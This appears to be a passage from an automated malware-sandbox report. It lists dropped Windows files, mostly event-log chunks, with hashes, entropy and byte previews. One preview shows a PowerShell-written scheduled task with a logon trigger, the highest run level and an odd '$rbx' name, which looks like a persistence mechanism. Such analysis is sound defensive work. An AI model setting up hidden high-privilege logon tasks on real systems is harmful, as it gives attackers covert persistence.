                            SSDEEP:48:yei1q97SfeQn1ab9o9V9Lvara+i3iusupRCRvA9ufAuRa7G5XhPsbN1jANg8iJXI:t2nkp2Gdi3ipVA9ll7EhAMz3cHtr+
                            MD5:3D2655B2FBBD4D24033DBB79B921697C
                            SHA1:08CE2A84327E1EEF614008809F15A9F126B28A05
                            SHA-256:2CFED75D94EC6FC435D61F370CCA3D40E910A8FB10A97D45D51FFEE0F87A7793
                            SHA-512:F261B1727096BBF17F97402A5F7D19C46F5481227E50AD43294C935C13CBB6494F1DD068E2FA5DC26F10926600D2E17289C44785518936C69A5A7670A0D68182
                            Malicious:false
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.4.-.1.0.-.0.4.T.0.4.:.0.1.:.4.7...9.8.9.-.0.4.:.0.0.<./.D.a.t.e.>..... . . . .<.U.R.I.>.\.$.r.b.x.-.Q.g.S.1.M.4.P.T.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.l.a.b.l.e.<./.R.u.n.L.e.v.e.l.>..... . . . . . .<.G.r.o.u.p.I.d.>.b.u.i.l.t.i.n.\.U.s.e.r.s.<./.G.r.o.u.p.I.d.>..... . . . .<./.P.r.i.n.c.i.p.a.l.>..... .
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):1.1940658735648508
                            Encrypted:false
                            SSDEEP:3:Nlllul4/h:NllU
                            MD5:C31A1BA17DD8856E8E930807FA308CBE
                            SHA1:96AAFF7B013066D2EDA2958128FD049915028849
                            SHA-256:91620CED47374C83D43981E1930EF7C78B6E7651F108F6CB18A60CAE8487E1CF
                            SHA-512:6D6AB14A905EC859D23B2C2BA163A144FB35162AA05CFF85478291C0562085B8569A706B2A7A28CA97C958BE2FC3840CEBA99D212CB317CD5176784B194DAA59
                            Malicious:false
                            Preview:@...e................................."..............@..........
                            Process:C:\Windows\System32\wbem\WMIADAP.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):3444
                            Entropy (8bit):5.011954215267298
                            Encrypted:false
                            SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                            MD5:B133A676D139032A27DE3D9619E70091
                            SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                            SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                            SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                            Malicious:false
                            Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
                            Process:C:\Windows\System32\wbem\WMIADAP.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:modified
                            Size (bytes):950
                            Entropy (8bit):2.8937402169492104
                            Encrypted:false
                            SSDEEP:12:Q1NXCaAGaCGopGGD1JTi0SMfmCwOx6ivzivG:Q3wU/IM1x6ozoG
                            MD5:9D007E669CE25371EE9401DC2AC21D2A
                            SHA1:6F0CACCD76F7A94BBCB1124D398E9139E09C6FC4
                            SHA-256:632004D14715476801408FC10E1B119BDC90378D2E8D573B7C14A06816799FA8
                            SHA-512:AB9FEA61D8C00701E402D700873CA2B9A4FFB7D62557A2ED1C86571DCC40D3C33F7B7E358DF506C134EE4ABEE39B1167846C64A34FA19448FD1DC36AF19F579C
                            Malicious:false
                            Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):78200
                            Entropy (8bit):4.069487817829082
                            Encrypted:false
                            SSDEEP:768:4k3WxWwWLvOUZucxvbNp8CCcicolb/AjQwEPnPK0xvFk3WxWwW8:dLkctNp8TcG/Ajs7C8
                            MD5:35F5E61B44C99E5961D791D65DD17821
                            SHA1:EEECB77D0C11E84E03F3A3D8D32DA60B0C425431
                            SHA-256:B6B776F4A27841D857B1CC867F758A0616F9774142F2A55DDB3A2440934D6BA3
                            SHA-512:69772C98E379465695ED3970FF245780716E8EB877E4B7211A731953777555A7F40402DAFB05B541C53508CB3411C60C3F95EB1025E177A3D249BEF5CD15BDEF
                            Malicious:false
                            Preview:ElfChnk.................r.......w...............@.............................................................................(.............$...............................=...................................................................................K.......$...............................m...............F...........................t...................M...c...........................n.......................................................................................&...............................**......v........B..1............g&.....................................................................................!...d..............B..1...........v..............w.)Cn...................p.o.w.e.r.s.h.e.l.l...e.x.e...1.0...0...1.9.0.4.1...5.4.6...7.e.d.a.4.1.1.5...u.n.k.n.o.w.n...0...0...0...0...0.0.0.0.0.0.0.0...0.0.0.0.0.0.0.0...0.0.0.0.7.f.f.d.9.b.b.d.1.c.6.3...1.2.d.c...0.1.d.b.1.6.3.1.0.7.6.1.1.4.d.f...C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.2559303785119753
                            Encrypted:false
                            SSDEEP:384:8he6UHi2uepX7xasnPC3FzFtpFDhFPFyF8422:8VUHiapX7xadptrDT9W84N
                            MD5:8EF6E9746DE72295DFCB3197A49966C3
                            SHA1:3FF34508B83382569DF87C14DDFF8596D1E29980
                            SHA-256:BEBF782FCDAD337843593DEE32D030C922424367A50078E30329BE63259E648A
                            SHA-512:0F0690586ACE4A7D37D948805FD2464D8ED5A1B42CE42F68F607072B5836B7CB2032F468FC1C1E921C8FB097694DDD3BE2821D193B73E5552A45F253816DB513
                            Malicious:false
                            Preview:ElfChnk.........4...............4....................?........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.010692427789071
                            Encrypted:false
                            SSDEEP:384:GhLNzhNCjN0QNGNgN7NxEN5N0RN0zN0mN0RN00N0oN0xN0qNeN0NN0UN0lN09N0Q:GnqqIJMa/Mh9sUwBYAJGUarGlEwxV
                            MD5:26C4C5213F3C6B727417EF07207AC1E0
                            SHA1:1815CC405C8B70939C252390E2A1AEC87EFF45F2
                            SHA-256:767656ADC7440970A3117E0DA8E066D9A3E1DA88CBC82ACABCFA37A3985D5608
                            SHA-512:0355BBF16EB471698F47189031E8E18306D8F748E6CC5328C33301BEAAE435647532B24F5EC42A94B92390C19E60D11846B412C6747DC82DC98999E649607B65
                            Malicious:false
                            Preview:ElfChnk.%.......J.......%.......J............b..Pe.....:....................................................................&...................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........].......M...............................VY..................................**......%........0................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.178919462156868
                            Encrypted:false
                            SSDEEP:384:ohfVaVtVbVHVyV5V+VSVBVNVEVrVBVeVPVpVCVigVgVpVeVNVkVUVAVJVgV6VdVF:ohfKm3t
                            MD5:EE25A9478FAB4FBAB6D89F9F2E7C7EF4
                            SHA1:643403023901E8CB6CB7AE3269A883C2BA3CC4C7
                            SHA-256:699618BC087165CE1AC1F7BE088642E80AA920F351D74DDD3454FA2BFA37C374
                            SHA-512:A13D249D057F6899FB8074B01AEB5A367CC0F36664E4CE479D0EB61A6823ADBBED0D44ADECE4BAE7F5E82AA34B31C02A6E4F3D89827809B39089064F09D01AD9
                            Malicious:false
                            Preview:ElfChnk...............................................}E....................................................................<..N................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**.. .............k...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.428104610855212
                            Encrypted:false
                            SSDEEP:384:UhTm5mcdmNQDmomTDDr0moOm3OPlfmMsgJm5mnmYmcmum/mqmlmtmumbsmbmvMmk:UBdD6CL49mVpgwQFQ
                            MD5:D6AA1FCD43790A397134C5CFC5A86D46
                            SHA1:3F8C5749681331F3316BAEE46632ECDA80712CED
                            SHA-256:C3DA75ABD049DCEDF544ED37E2F12F71ACF2B6C7B0E4E8B13209415F831D266A
                            SHA-512:50872703EC944464CFC5B52813E5AEEB9DA101037C1C641A872F311750DE47DD04885DA3856E30030C2CAA5D5DE2A1CABD290B80CAFAD986C87A9CA8501A152E
                            Malicious:false
                            Preview:ElfChnk..!.......!.......!.......!....................=......................................................................./U................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................#...............&...................................**.......!......o.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.3524106147187157
                            Encrypted:false
                            SSDEEP:48:MiEWNWwrP+AQNRBEZWTENO4bnB+zMgq+ckH58ykH5bOTLHywdHLP7jM0MckH58yj:SNVaO8sMa3Z85ZMLtrjja3Z85Zu
                            MD5:C665BB87978EBBDC71354545579E80C0
                            SHA1:CC7F6C571B7198162112AF051CDD8B88FF24A626
                            SHA-256:DBBA0D6AEE8D46D3D7EDE566ED4EB6356B8C9D914258DE3B7C8BDECDF2C13325
                            SHA-512:1EE6B50575CDEDCACFF2F3BA500ECD9AA1F898AA04DF792F80CF6BECF6BB9C7905A63D28EEB9E54E1BBAC7EEF564E517112D6DF538E068A1144D516176EA0252
                            Malicious:false
                            Preview:ElfChnk.....................................p.......=..J....................................................................SOq.............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.014860518194814
                            Encrypted:false
                            SSDEEP:1536:xbBN2A4VD7VAx8whAGU2woJQghcI5oIRA4Hw:
                            MD5:4FB8E2CF8B3F20534836684947962DC2
                            SHA1:B263607E627C81DA77DB65DF5AED2F3FD84B83E2
                            SHA-256:DEAB680C467984C31D118AC595F0F57E573CEEC460CC4B43FCEB0BD66F731294
                            SHA-512:D982DB741A044E222D567712FB4799FF6524A1D451C3D2EE3DF7EB17031AD20EF4EC7098BCFB3E2B00C929EB6569C858EFCF275B28240425E4BF8D994AED9053
                            Malicious:false
                            Preview:ElfChnk.........V...............V...................0q....................................................................... I............................................=...................................................................................%.......................................X...............?...............................................M...F...................................................................................................................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.15655690871689
                            Encrypted:false
                            SSDEEP:768:SPB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9tFk6dd3s:eXY5nVYIyyqED5BVZUeouPZ
                            MD5:2DE60575CB719BF51FAB8A63F696B052
                            SHA1:BD44E6B92412898F185D5565865FEA3778573578
                            SHA-256:7C14D6D72CD2DE834A0C4D17A68B2584B83B81C647D2C439E1071600E29A803D
                            SHA-512:0471E7824795996992E736F33FEA7AF70EA909804DE3AC59EE76B5D0403901A5147558256C3AAE87BA8F1747D151DE63134661BEB9F6E0FF25AB0E3E89BC6B4A
                            Malicious:false
                            Preview:ElfChnk.........o...............o..........................................................................................._..................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):72208
                            Entropy (8bit):2.2541241390870326
                            Encrypted:false
                            SSDEEP:384:+oroay5oQoay/oioaykoBoay+o/Doay9hdo69CcoTorNorWorbvorTorZorQorNd:dmDCYdAruMx
                            MD5:EE1D987C758D86C483BAFBEA2EDEACFA
                            SHA1:AED9B378A9200B09637BE24A9ED6F85E3E632EE6
                            SHA-256:2D7FB5C71035E8C85B1B98772FAC93D8F72E49853A5D68D1CE2F41E7B8EA5466
                            SHA-512:32337026938236CA9078FFE22989E307933986910680B0AEDA0432AECF5AE7EB2237901E09A2E4E3772020F9DE6C30FCB0B7B0F4BF10FCA0C954D6AD102E1700
                            Malicious:false
                            Preview:ElfChnk.........)...............)...........Hb...d.............................................................................................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................=/...........$..U)..............................**...... ...........1..............$..............................................................>.......V...7.!..o..................1.....&O......'O....P....... ....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...be.`=/..................l...............K.\.D.e.v.i.c.e.\.H.a.r.d.d.i.s.k.V.o.l.u.m.e.3.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.8524226245257144
                            Encrypted:false
                            SSDEEP:384:JhAiPA5PNPxPEPHPhPEPmPSPRP3PoPpPTP8PXPr5P:J2Nr
                            MD5:B8E105CC52B7107E2757421373CBA144
                            SHA1:39B61BEA2065C4FBEC143881220B37F3BA50A372
                            SHA-256:B7EE076088005866A01738ECD3421A4DA3A389FFB9EEB663687823E6647F7B4B
                            SHA-512:7670455904F14DA7A9EEFBAD5616D6D00EA262C979EDABB433182500B6EF918C6E534C94DF30D829016C8539DF12CAD5F53EC884C45AA71ACA35CF9B797361BC
                            Malicious:false
                            Preview:ElfChnk......................................#...&...l2.......................................................................................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................#..........'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.8432997252442703
                            Encrypted:false
                            SSDEEP:384:4hZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+l9:4WXSYieD+tvgzmMvRpBWfb
                            MD5:39EE3557626C7F112A88A4DE12E904C1
                            SHA1:C307FECC944D746A49EEA6451B7DA7301F03504C
                            SHA-256:2B47146267E6F31192C54D3EDA77EC9ABE6A88B1C72BA9FE789C8073FD632A5A
                            SHA-512:304C866E246B3F63BF126B33AED784913A078D44913FD987D896D2D960578B61BA7E24BA3CB8FC76608AB1E5702D0FE587A5FB8C38CDF8913D60F88B1435A2D9
                            Malicious:false
                            Preview:ElfChnk......................................"...&.....k.....................................................................n..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................."..................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.9958304436685177
                            Encrypted:false
                            SSDEEP:384:ghqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28g:gbCyhLfIXBS50G
                            MD5:139666E45F01B24FAF6F0BBD3C472C73
                            SHA1:FFA815ED1A88F4E54C2DECE84DD0427E74D23AB1
                            SHA-256:679A66239AE8631182914EFA619C38FA70FBE8D2119303D56039FE0D23BB32ED
                            SHA-512:92A4FA069765BC44125B489A7BF8E4B37EB1EBA6B0F3F2F49B151CDEA67B6DA6F06FB412C5A1CB74F93CBFBBB406D945A61E39AABD1BAC416616ADB78FC51B1D
                            Malicious:false
                            Preview:ElfChnk.........H...............H...........@........[*......................................................................KV.................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n...................................................6...................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.838106263184782
                            Encrypted:false
                            SSDEEP:768:ccMhFBuyKskZljdoKXjtT/r18rQXn8r3e5POH:JMhFBuVge
                            MD5:A2D41740C1BAF781019F282E37288DDF
                            SHA1:A6FE635B3EC8A6923EDE10C23FC79DD32EF4F621
                            SHA-256:7008D3010B17C0B09643D10D26B19FB971BB1963C414C1466BEAD617CF9F15E7
                            SHA-512:E33A0A2F9473D2D05E9704FE16E6EE34FB51FD8E25A3D60E1F7A67665CA14421B6511D896526AFC7CAE1BF629BB7013FA10663620C5450F1BB51A465EF5A51CB
                            Malicious:false
                            Preview:ElfChnk.........?...............?...................<.md.....................................................................?.Q................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A......&...................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.634418630947688
                            Encrypted:false
                            SSDEEP:768:/VQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaUeI36ISKEeKRe:cH
                            MD5:A00BAFFCABB00428EA0512FCECCC55E5
                            SHA1:19F7C942DC26C3FF56D6240158734AFF67D6B93E
                            SHA-256:92264C9E28AB541669DED47CFAF1E818EBD863FA9E8FC6B0F52175D694A9E0D9
                            SHA-512:DF94AA8FA0610A0EFE7BAC0DB2A01645A4CD1C7FAD62E914EF914B526B651ED62600F63909D26149FD17C259348DADE05F48759B1DF092970251DB86690CC2B6
                            Malicious:false
                            Preview:ElfChnk.........m...............m.....................]......................................................................p.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................................%0......**..@...........WW. ..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.0646587531847893
                            Encrypted:false
                            SSDEEP:384:eh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDK:eMAP1Qa5AgfQQgniwS
                            MD5:399CAF70AC6E1E0C918905B719A0B3DD
                            SHA1:62360CD0CA66E23C70E6DE3340698E7C0D789972
                            SHA-256:FD081487CCB0ACEAD6F633AADBA4B977D2C9360CE8EAC36EAB4E3C84A701D849
                            SHA-512:A3E17DA61D4F7C0C94FD0B67707AE35250656842D602906DE515B5E46ECD5078AC68AE607B99DC1A6061B0F896759FE46FF8EE350774205635D30363D46939EA
                            Malicious:false
                            Preview:ElfChnk......................................g...j..%s.g........................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&...........c..;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.4364303862010575
                            Encrypted:false
                            SSDEEP:384:PhrE2E+EAsbE3VgEWsUiEcEf4eEOhEmELVFEEE5ejElEreEFEzEAEWE+EWEeEKEy:P3sleByhfIwPGa1SEzy
                            MD5:2BB73ACC8F7419459C4BF931AB85352C
                            SHA1:F1CE2EB960D3886F76094E2327DD092FC1208C7E
                            SHA-256:1969400F6FC72AD4A41092FEC53A19078C98DE9FCB2507A3BD8E1930B2447B62
                            SHA-512:7D882184DA11B490E111502C8193B73248259D43CC5DCE021CD7264212F1BCD3D62F2A3A2F86929663E2E904961D4F1E406E314020FE904D41694A09C1EB0457
                            Malicious:false
